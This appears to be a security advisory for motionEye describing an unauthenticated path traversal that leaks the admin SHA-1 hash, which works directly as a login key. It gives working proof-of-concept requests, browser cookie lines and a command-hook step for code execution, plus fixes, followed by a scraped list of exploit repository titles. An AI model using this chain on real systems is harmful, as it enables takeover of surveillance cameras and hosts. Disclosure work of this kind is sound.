# Partial Authentication Bypass: Unauthenticated Admin Credential Theft via Path Traversal ### Summary Myself and others have reported several RCE vulnerabilities to this project. However, due to the nature of the app, these are largely not of all that much value, as there is built-in functionality to run commands upon certain actions — i.e. RCE is by design. With that in mind, I endeavored to find some sort of auth bypass, and was slightly successful. When the admin password is set but the normal (surveillance) user password is left empty (the default), an unauthenticated attacker can exploit a path traversal vulnerability to read the motionEye configuration file from disk. This file contains the admin password as a SHA-1 hash, and that hash is accepted directly as a signing key for admin API requests — no cracking required. The result is full admin access from zero credentials. This is a realistic scenario: many installations set an admin password to protect the settings UI but leave the normal user password empty so household members can view camera feeds without logging in. ### Details The vulnerability chains two independent issues: **1. Unauthenticated normal-user access when `@normal_password` is empty** In `motioneye/handlers/base.py`, lines 149-151: ```python # no authentication required for normal user if not username and not normal_password: return 'normal' ``` When `@normal_password` is empty (the default — see `config.py` line 2251: `data.setdefault('@normal_password', '')`), any request without a `_username` parameter is silently granted `normal` user access. This is by design for convenience, but it means all normal-level endpoints are fully unauthenticated. **2. Path traversal in `MoviePlaybackHandler` (and related handlers)** The movie playback handler at `motioneye/handlers/movie_playback.py` serves recorded video files. It accepts a filename in the URL path: ``` GET /movie/<camera_id>/playback/<filename> ``` The filename is passed to `mediafiles.get_media_path()` (`mediafiles.py` lines 497-500): ```python def get_media_path(camera_config, path, media_type): target_dir = camera_config.get('target_dir') full_path = os.path.join(target_dir, path) return full_path ``` When `path` is an absolute path (e.g. `/etc/motioneye/motion.conf`), Python's `os.path.join()` discards `target_dir` entirely and returns the absolute path as-is. This would normally be caught by Tornado's `StaticFileHandler` path validation, but `MoviePlaybackHandler` explicitly overrides both safety checks (`movie_playback.py` lines 111-115): ```python def get_absolute_path(self, root, path): return path def validate_absolute_path(self, root, absolute_path): return absolute_path ``` This allows reading any file on the filesystem that the motionEye process can access. The same path traversal exists in the movie download, picture download, and picture preview handlers: - `GET /movie/<camera_id>/download/<filename>` - `GET /picture/<camera_id>/download/<filename>` - `GET /picture/<camera_id>/preview/<filename>` **3. Admin hash stored in a readable config file and accepted directly as a signing key** motionEye stores the admin password as `SHA1(plaintext)` in its main configuration file (`motion.conf`), written as a comment line: ``` # @admin_password 7b7d55439abccf4ae83047c1af2707e6eb6664db ``` The authentication code in `base.py` (lines 137-147) accepts signatures computed with **either** the raw stored hash or `SHA1(stored_hash)` as the signing key: ```python if username == admin_username and ( signature == utils.compute_signature( self.request.method, self.request.uri, self.request.body, admin_password ) or signature == utils.compute_signature( self.request.method, self.request.uri, self.request.body, admin_hash ) ): return 'admin' ``` Here `admin_password` is the raw value from the config file (the SHA-1 hash), and `admin_hash` is `SHA1(admin_password)` — a hash of the hash. Since the stored value is already a SHA-1 hash, and it is accepted directly as a valid signing key, there is no need to crack it. The attacker can use the stolen hash immediately. Furthermore, the client-side JavaScript (`static/js/main.js` line 3631) computes `sha1(plaintext_password)` and stores it in the `meye_password_hash` cookie as the signing key. This is the same value as `@admin_password` in the config file. ### PoC **Step 1** — Read the config file (unauthenticated, requires empty normal password): ``` GET /movie/1/playback//etc/motioneye/motion.conf HTTP/1.1 Host: target:8765 ``` Response contains: ``` # @admin_username admin # @admin_password 7b7d55439abccf4ae83047c1af2707e6eb6664db ``` **Step 2** — Use the hash to become admin. In the browser console: ```javascript document.cookie = "meye_username=admin; path=/"; document.cookie = "meye_password_hash=7b7d55439abccf4ae83047c1af2707e6eb6664db; path=/"; location.reload(); ``` The page reloads with full admin access. All subsequent requests are signed with the stolen hash. **Step 3 (optional)** — Achieve RCE via the admin config API. The admin can set `command_notifications_exec` or `command_storage_exec` to arbitrary shell commands, which are written into motion event hooks and executed by the motion daemon: ``` POST /config/1/set HTTP/1.1 Content-Type: application/json {"command_notifications_enabled": true, "command_notifications_exec": "touch /tmp/pwned", ...} ``` ### Impact - **Privilege escalation from zero credentials to full admin** on any installation where the admin password is set but the normal user password is left empty (the default configuration). - **Arbitrary file read** of any file readable by the motionEye process (typically running as `motion` user, or `root` on motionEyeOS). This includes `/etc/passwd`, `/etc/shadow` (if permissions allow), SSH keys, and application secrets. - **Full remote code execution** — once admin access is obtained, the attacker can inject arbitrary shell commands via motion event hooks (`command_notifications_exec`, `command_storage_exec`, or `web_hook_storage_url`). Commands execute as the motion daemon user. - **Realistic attack surface** — this is a common configuration for home surveillance setups where the admin password protects settings but camera feeds are left open for household members. Public instances are discoverable via Shodan (`http.favicon.hash:1898775751`). ### Suggested Fix 1. The path traversal should be fixed by validating that the resolved path stays within the camera's `target_dir`. Do not override `get_absolute_path` and `validate_absolute_path` to bypass Tornado's built-in protections. At minimum, reject absolute paths in the filename parameter. 2. Consider warning users in the UI when the normal user password is empty, as this makes all normal-level endpoints (including the vulnerable file handlers) fully unauthenticated. 3. The admin password hash should not be stored in a file that is served by the same file handlers used for media content. Alternatively, the `@` metadata lines should be moved to a separate configuration file that is not within any camera's media path.
PoC: YellowKey-BitLocker-CVE-2026-45585
YellowKey BitLocker recovery - bitlocker yellowkey, yellowkey bitlocker, CVE-2026-45585, yellowkey github, yellowkey vulnerability, yellowkey CVE, TPM, BitLocker recovery key backup, Windows 10/11, CLI GUI, portable audit tool. Download:🡇
PoC: CVE-2026-38192
pluck-CMS-4.7.20-code-injection-vulnerability
PoC: My-Exploits
Metasploit modules, Python PoCs and throwaway Docker labs for four platform CVEs: Keycloak (CVE-2026-18963), Apache NiFi (CVE-2026-39816), HashiCorp Vault (CVE-2026-5006), HashiCorp Nomad (CVE-2026-7474).
PoC: CVE-2025-66478-PoC-Reverse-Shell
CVE-2025-66478 PoC
PoC: cve-writeups-and-pocs
CVE-2026-80724 PoC + full write-up — Linux kernel ptp/vmclock read-only mapping becomes writable (VM_MAYWRITE). Discovered, reported & fixed by Abdifatah Suruur (suruurism)
PoC: CVE-2026-79483-FastGPT-NoSQL-Injection
FastGPT Community Edition NoSQL Injection PoC (CVE-2026-79483)
PoC: givewp-cve-2026-82222-rce-lab
Authorized Docker lab and clean PoC for validating CVE-2026-82222 RCE in GiveWP 4.16.5.1 and the 4.16.7.2 fix.
PoC: CVE-2026-19745
Learn how I found my first two CVEs by pure accident.
PoC: cve-2026-23989-opencloud-lab
Reproduction lab (A/B Docker) for CVE-2026-23989 — OpenCloud / ownCloud Infinite Scale public-link scope-validation bypass in Reva
PoC: CVE-2026-21962-Blog
CVE-2026-21962 Açığı için blog sayfası oluşturdum.
PoC: PoC-and-yara-rules-of-CVE-2025-59528-Flowise-has-Remote-Code-Execution-vulnerability
poc and yara rules
PoC: CVE-2026-72898
Metabase SQLi
PoC: CVE-2026-19478
GitLab Code injection
PoC: CVE-2026-75604
CVE-2026-75604 (Next.js Windows RCE) PoC - unauthenticated RCE via cache path traversal + forged Server Action; for authorized security testing
PoC: ghostlock-x200-app
vivo X200 设备端一键 root App(Shizuku 授权 shell 域执行,CVE-2026-43499)
PoC: gha-lab-b9842b12c0
Authorized security-research lab reproducing CVE-2021-21423 (GHSA-gg2g-m5wc-vccq): projen rebuild-bot pwn request via issue_comment
PoC: gha-lab-e4a85583c3
Security-research lab reproducing CVE-2020-36762 (GHSA-h9gr-83jq-f3xc): bash command injection via github.event.comment.body in the comment workflow of ONSdigital/ras-collection-instrument
PoC: Root-My-Galaxy
KSU installer for supported Samsung Galaxy firmware with CVE-2026-43499
PoC: CVE-2026-78905-Facebook-Account-Takeover
Social Media Infrastructure Vulnerability Research. CVE-2026-78905: OAuth token reuse and session hijacking in Facebook's Graph API.
PoC: CVE-2026-78904-Digital-Dinar-Drain
CBDC Infrastructure Vulnerability Research. CVE-2026-78904: Infinite mint and redemption bypass in central bank digital currency APIs.
PoC: CVE-2026-78903-SWIFT-Kick-to-the-Creds
Offensive Research & Exploit Development. Vulnerability research, PoC development, and offensive tooling for financial infrastructure.
PoC: CVE-2026-60004-Gitea-RCE-PoC
🫖 Direct single-target Gitea CVE-2026-60004 RCE validation PoC
PoC: CVE-2026-60004-Gitea-Validator
🫖 Contract-correlated discovery and authorized validation tool for Gitea CVE-2026-60004
PoC: cve-2026-67363-67364
Balboa form Command Injection POC
PoC: Simulation-d-attaque-BlueBorne-sur-v-hicule-connect-
Simulation complète d'une attaque Bluetooth (CVE-2017-1000251) sur un véhicule autonome via CARLA Simulator ; exploitation de la vulnérabilité BlueBorne pour accéder au bus CAN et déclencher un freinage brutal, en environnement isolé (Kali Linux VM / VMware / Python).
PoC: CVE-2026-76581-Detector
Safe passive detector for identifying WPMU DEV Dashboard versions affected by CVE-2026-76581.
PoC: htb-machine-ringdown
Detailed design & exploitation writeup for Ringdown—an original Debian/Asterisk vulnerable machine featuring CVE-2024-42365 (AMI), PJSIP pre-hash cracking, and Fail2ban POSIX ACL privilege escalation.
PoC: gha-lab-83342297e0
Authorized security-research lab reproducing CVE-2024-41127 (GHSA-wcjf-5464-4wq9): poisoned pipeline execution via artifact-controlled code injection in ci-failure-comment.yml. Snapshot of monkeytypegame/monkeytype @ deeea0f.
PoC: WP2Shell-Scanner
Read-only CLI to check whether a WordPress site is exposed to WP2Shell (CVE-2026-63030 / CVE-2026-60137)
PoC: phpBB-CVE-2026-48611
Automated PoC for CVE-2026-48611 — phpBB OAuth login_link authentication bypass
PoC: Project-CVE-2026-45833
CVE-2026-45833 ChromaDB
PoC: CitrixBleedCVE-2026-8452-2025-5777
CitrixBleed Exploit Tool - CVE-2025-5777 & CVE-2026-8452. Unauthenticated remote memory read from Citrix NetScaler ADC & Gateway. Steal admin session tokens, extract nsroot hashes, dump secrets, and bypass MFA. Python 3 exploit with full memory parsing.
PoC: CVE-2026-76581
CVE-2026-76581
PoC: drupalgeddon2-cve-lab
Drupalgeddon2 CVE-2018-7600 vulnerable Drupal 7 lab
PoC: shellshock-cve-lab
Shellshock CVE-2014-6271 vulnerable CGI lab
PoC: log4shell-cve-lab
Log4Shell CVE-2021-44228 vulnerable lab
PoC: CVE-2026-18741
PoC CVE-2026-18741
PoC: CVE-2026-12513
CVE-2026-12513 Vulnerability Advisory & PoC — Discovered by Huynh Kien Minh (MinhHK).
PoC: ghostlock-oppo-watch3pro
CVE-2026-43499 on OPPO Watch 3 Pro
PoC: cve-2026-82222-poc
Public PoC for CVE-2026-82222
PoC: zk-xml-probe
Static XML fixtures for authorized bug bounty testing of XML parser behaviour (CVE-2026-45071).
PoC: SOC335-CVE-2024-49138-Investigation
SOC investigation of a CVE-2024-49138 exploitation alert using log analysis, threat intelligence, and endpoint containment.
PoC: papercut-toolkit
#PaperCut CVE-2026-81578 + CVE-2026-82078 Defense Toolkit 2 3 A **defensive** toolkit to check and understand exposure to the chained
PoC: PaperCut-CVE-2026-81578-82078
Security research tool for PaperCut CVE-2026-81578 & CVE-2026-82078
PoC: vankyo-s30-bootloader-unlock
Vankyo MatrixPad S30 (Unisoc SC9863A) — Bootloader unlock via CVE-2022-38694 FDL1 method
PoC: CVE-2026-21962-Blog
CVE-2026-21962 Açığı için blog sayfası oluşturdum.
PoC: hdwebmobile-formula-pricing
WooCommerce plugin: safe formula-based product pricing, closing CVE-2026-4001's eval()-based RCE
PoC: CVE-2026-82286-gpt-crawler-Arbitrary-File-Write
CVE-2026-82286 — gpt-crawler <=1.5.1 unauthenticated arbitrary file write via outputFileName (POST /crawl). PoC + self-contained Docker lab. CVSS 8.6, CWE-22.
PoC: CVE-2026-24061-payload
A PoC exploit for CVE-2026-24061 - GNU InetUtils telnetd Argument Injection Authentication Bypass
PoC: CVE-2026-66384
CVE-2026-66384 - Draft or TODO
PoC: CVE-2026-33017-PoC-Reverse-Shell
CVE-2026-33017 PoC Reverse Shell
PoC: CVE-2026-33057---Mesop-Unauthenticated-RCE-PoC-and-yara-rules
CVE-2026-33057 - Mesop Unauthenticated RCE PoC and yara rules
PoC: CVE-2026-10036-speechbrain-rce
SpeechBrain < 1.1.1 checkpoint metadata RCE via unsafe PyYAML parsing of CKPT.yaml.
PoC: CVE-2025-55182-poc
I know you are probably here from Hack the Box, if so, yes this one actually works.
PoC: Project-CVE-2026-50751
IKEv1 VPN scanners, attempts a Check Point authentication-bypass exploit, and includes internal network scanning and reverse-shell features.
PoC: CTT-Enhanced-CVE-2026-46339-Exploit-Engine
A specialized Python framework that executes unauthenticated remote code execution via the 9Router Model Context Protocol (MCP) bridge by deploying a 33-layer temporal phase cascade, Riemann-Hadamard dispersion, and an 11 ns wedge filter to bypass traditional proxy and process-monitoring defenses.
PoC: Zimbra-CVE-2026-73570-Rules
Wazuh Rules for Detection Zimbra (CVE-2026-73570).
PoC: CVE-2022-46169
Cacti 1.2.22 unauthenticated command injection
PoC: CVE-2024-23897
Jenkins CVE-2024-23897 — CSRF-crumb aware PoC
PoC: CVE-2025-10952-ml-logger-AFR
PoC for CVE-2025-10952 — ml-logger unauthenticated arbitrary file read. CVSS 5.3
PoC: CVE-2026-65643
CVE-2026-65643 - Draft or TODO
PoC: cve-2023-23397-detection-lab
Detection and mitigation research lab for CVE-2023-23397 using network and endpoint security telemetry.
PoC: fastjson-cve
fastjson-cve-2026-16723
PoC: CVE-2026-23751-poc
Patched RemotingClient to exploit CVE-2026-23751 (Tungsten Automation - Kofax Capture Unauthenticated File Read/Write and SMB coercion via .NET HTTP Remoting)
PoC: CVE-2023-27350-CVE-2023-27351
CVE-2023-27350, CVE-2023-27351 - PaperCut - Draft or TODO
PoC: Project-CVE-2026-33017
CVE-2026-33017 - Langflow Unauthenticated RCE Exploit
PoC: CVE-2026-70463
Testing CVE-2026-70463 by Fyyre
PoC: 2025-Oracle-SSO-LDAP-Attack-Post-Incident-Written-Report
Post-incident report analyzing the Oracle Cloud SSO/LDAP supply chain attack (CVE-2021-35587). Details the exploitation of legacy server infrastructure, impact across 140,000+ cloud tenants, root-cause findings, and phased mitigation strategies.
PoC: CVE-2026-20131-Post-Incident-Written-Report
Post-incident report on CVE-2026-20131 (CVSS 10.0), a Cisco FMC insecure deserialization vulnerability exploited by Interlock ransomware. Details root-cause analysis, lateral movement tactics, and emergency containment strategies.
PoC: ghostlock-pfem10
GhostLock (CVE-2026-43499 / IonStack) research for OPPO Find X5 Pro (PFEM10): exploit chain, progress, blocker log, and OPPO 5-series kernel notes
PoC: htb-labs-connected
Hack The Box Connected machine write-up featuring enumeration, CVE-2025-57819 exploitation, reverse shell, and privilege escalation to root via FreePBX and incron.
PoC: spring-ai-sibling-loop-poc
Minimal reproduction for Spring AI ParagraphManager sibling self-loop OOM (incomplete fix of CVE-2026-47851)
PoC: mssharepoint-scanner
A scanner for CVE-2026-55040 and CVE-2026-63520, designed to determine whether the server is affected by these two CVEs.
PoC: weblogic
Oracle WebLogic Console unauthenticated auth bypass + RCE exploit (CVE-2020-14882 / CVE-2020-14750)
PoC: CVE-2021-27876-veritas-backup
Metasploit module: Veritas Backup Exec Agent SHA-auth NDMP remote code execution (CVE-2021-27876/27877/27878)
PoC: Project-CVE-2026-65351
For educational purposes
PoC: rmg-s9180-fzg1
Root My Galaxy SM-S9180 (dm3q) S9180ZHS8FZG1 payload port - CVE-2026-43499 + KernelSU LKM
PoC: hacktivity-vulns-exploits-lab
Writeup + CVE analysis + countermeasures for the Hacktivity 'Vulnerabilities, Exploits, and Remote Access Payloads' lab (netcat shells, Metasploit, CVE-2010-1240, CVE-2004-2687).
PoC: CVE-2026-55040-Mass-Exploit
CVE-2026-55040
PoC: Project-CVE-2026-75604
A Python-based exploitation framework for CVE-2026-75604 that enables authorized penetration testers to validate Next.js Windows cache traversal vulnerabilities. Deploys reverse shells and webshells via path traversal, with built-in target verification and proxy support for seamless integration into standard pentest workflows.
PoC: CVE-2026-18963
CVE-2026-18963 Keycloak Reset-Credentials State Bypass Detector
PoC: CVE-2015-3246
CVE-2015-3246
PoC: CVE-2015-5287
CVE-2015-5287
PoC: htb-labs-nexus
Hack The Box Nexus machine write-up covering reconnaissance, Gitea credential discovery, Krayin CRM exploitation via CVE-2026-38526, initial access, and privilege escalation through a vulnerable Gitea template synchronization service.
PoC: Cisco-CVE-2026-20303-More
CVE-2026-20303, CVE-2026-20304, CVE-2026-20310, CVE-2026-20312, CVE-2026-20313
PoC: CVE-Ubiquiti
CVE-2026-77542, CVE-2026-77543, CVE-2026-77545, CVE-2026-77550, CVE-2026-77551, CVE-2026-77552, CVE-2026-77553, CVE-2026-77554, CVE-2026-77557 - Draft or TODO
PoC: CVE-2026-18431
CVE-2026-18431 - Draft or TODO
PoC: CVE-2026-8467
CVE-2026-8467 - Draft or TODO
PoC: CVE-2026-50787
Security advisory for CVE-2026-50787: uncontrolled resource consumption in e-SIC Livre CAPTCHA generation leading to remote denial of service.
PoC: solarview-ics-vulnerability-analysis
Threat model and vulnerability analysis of Contec SolarView Compact (CVE-2022-29303)
PoC: CVE-2026-72898-metabase-sqli
Detector + root-cause analysis for CVE-2026-72898 (Metabase unauthenticated SQLi via reset_password)
PoC: By-Poloss..-..CVE-2026-18080
Poc CVE-2026-18080
PoC: CVE-2026-63520
POC pre-auth RCE on Sharepoint chain
PoC: f_hid-4.14-backports
Backports of three published f_hid fixes (incl. CVE-2026-31721, CVE-2026-31606) to an EOL Linux 4.14.190 Android vendor kernel, with on-device verification records.
PoC: chrome-vuln-scanner
Check for CVE-2026-79266. A use-after-free in the DevTools component allows arbitrary code execution inside the sandbox via a malicious Chrome extension leveraging social engineering.
PoC: CVE-2026-19912-CVE-2026-19913-CVE-2026-19914
CVE-2026-19912, CVE-2026-19913, CVE-2026-19914
PoC: CVE-2026-19632-POC
PoC for CVE-2026-19632 - TranslatePress – Multilingual <= 3.3.1 - Unauthenticated Account Takeover via Password Reset Link Disclosure
PoC: ghostlock-infinix-hot70
Proof-of-concept kernel exploit for GhostLock (CVE-2026-43499) on the Infinix Hot 70.
PoC: CVE-2025-2945-pgAdmin-RCE
PoC for CVE-2025-2945 — pgAdmin 4 authenticated eval() injection RCE, CVSS 9.9
PoC: CVE-2026-63072
CVE-2026-63072
Get alerted for CVEs like this
Register your stack and get notified within minutes when a matching CVE drops.
Start monitoring free